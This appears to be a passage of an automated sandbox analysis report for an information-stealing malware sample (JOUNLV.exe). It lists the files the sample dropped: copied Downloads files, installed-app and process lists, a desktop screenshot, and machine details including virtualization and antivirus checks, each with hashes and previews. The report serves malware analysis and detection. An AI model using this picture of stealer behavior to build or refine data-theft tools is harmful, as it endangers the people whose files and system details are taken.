                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NIKHQAIQAU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\RAYHIWGKDI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZBEDCJPBEY.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\System\Apps.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1446
                                                                                                                                                                                                                                                          Entropy (8bit):5.407572469297613
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:OKkf6JgXJ/lf3Jgd/5f6JgnQPUCddMfoHJTl5mfFKJTlNg8OfpJTlmfNJeikpqPm:lkf6JgXBlf3JgN5f6JgQPxdSfmJZwfFR
                                                                                                                                                                                                                                                          MD5:CEE54E135C6B81CDEAA9DFD5EA03C478
                                                                                                                                                                                                                                                          SHA1:AF1F82275F492BCAD22E069E85CCD3E0F2FC2B56
                                                                                                                                                                                                                                                          SHA-256:0766F4E7D7D88AF7F4EAE72FAD244BFDA8CFB0CA978CE238F321ACE705BF378F
                                                                                                                                                                                                                                                          SHA-512:F83AB89E6E68AB57AB50B278F9CFFC3F9D3FA86B692A3495070BFD29C06A2A25B89E8E40AEE48C11264C1F945079062F6B24A1EEA805DEB2916D388BBE3E92B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.APP: Office 16 Click-to-Run Extensibility Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008C-0000-0000-0000000FF1CE}...APP: Office 16 Click-to-Run Extensibility Component 64-bit Registration..VERSION: 16.0.16827.20056..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-00DD-0000-1000-0000000FF1CE}...APP: Office 16 Click-to-Run Licensing Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008F-0000-1000-0000000FF1CE}...APP: Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532..VERSION: 14.36.32532..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {0025DD72-A959-45B5-A0A3-7EFEB15A8050}...APP: Java 8 Update 381..VERSION: 8.0.3810.9..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {77924AE4-039E-4CA4-87B4-2F32180381F0}...APP: Adobe Acrobat (64-bit)..VERSION: 23.006.20320..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {AC76BA86-1033-1033-

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\System\Desktop_20241129_062052.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90744
                                                                                                                                                                                                                                                          Entropy (8bit):7.774005061481302
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:CU3fLMA4tzXX8le4YTSKjfMDhxwwTg8/m6hyh/sfUzoJ5lCk7:PTGzXXaYTSKjfGkwBVyFsf+k57
                                                                                                                                                                                                                                                          MD5:6C46EF298BDE17E42E5ED3FF9FF1CB1E
                                                                                                                                                                                                                                                          SHA1:95A8AFA7AA83FF6ED63DBDD017FEF0B37868F447
                                                                                                                                                                                                                                                          SHA-256:980E549F8B17857E0D051D72E8075273A3D8AD669A5F4CE5873D3EE268B9C0F8
                                                                                                                                                                                                                                                          SHA-512:D2BB80E0A9DC2164F11FE17B02070F9C5C3F48C6D9FE98D2806B554A89E089F5999A17FB4557971741A6416569CA049D6FC5DEDBB5E6E3CE4B356DAB41E074CF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\System\Info.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):509
                                                                                                                                                                                                                                                          Entropy (8bit):5.422491712734665
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:RFNbwPRbVkb21eVSxa2YCnPjtszJxsWWvdUXyR:3VwP/kbdcxaRgPjtQJxsWdS
                                                                                                                                                                                                                                                          MD5:133F5FB6E0F456259B846036D5C1FAAD
                                                                                                                                                                                                                                                          SHA1:44B8B2403B78116E3FCB385628EC5CD6BD3BAD10
                                                                                                                                                                                                                                                          SHA-256:E6DA8FAF8F694CCA4378C474586DA2A76C99EAC93ABC2CD0B68E0EBD4B5D151D
                                                                                                                                                                                                                                                          SHA-512:D92D5E6114BDE43B43A0E5A117C24B33738D11D41E8053049E7A5514C16C2E8AB112C113EBE3147046080684609DC3C8EC56F2F31E6EA9A6F36B9C17BE3A64CD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.[IP].External IP: 8.46.123.228.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 724536.System: Microsoft Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: PA_NMRCU.RAM: 4095MB.DATE: 2024-11-29 4:57:07 am.SCREEN: 1280x1024.BATTERY: NoSystemBattery (100%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Processes: False.Hosting: False.Antivirus: Windows Defender.

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\System\Process.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19326
                                                                                                                                                                                                                                                          Entropy (8bit):5.663781920299985
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:HXC23eEqfTGZUEfw5zqYCWithTBFw6KGJLsSCWkW/R4lZ1ir2:HhqfQUEY5mnWitDFw6KYWWk0R4lZ142
                                                                                                                                                                                                                                                          MD5:41B7259C42BACC4B4A401B668E0402AD
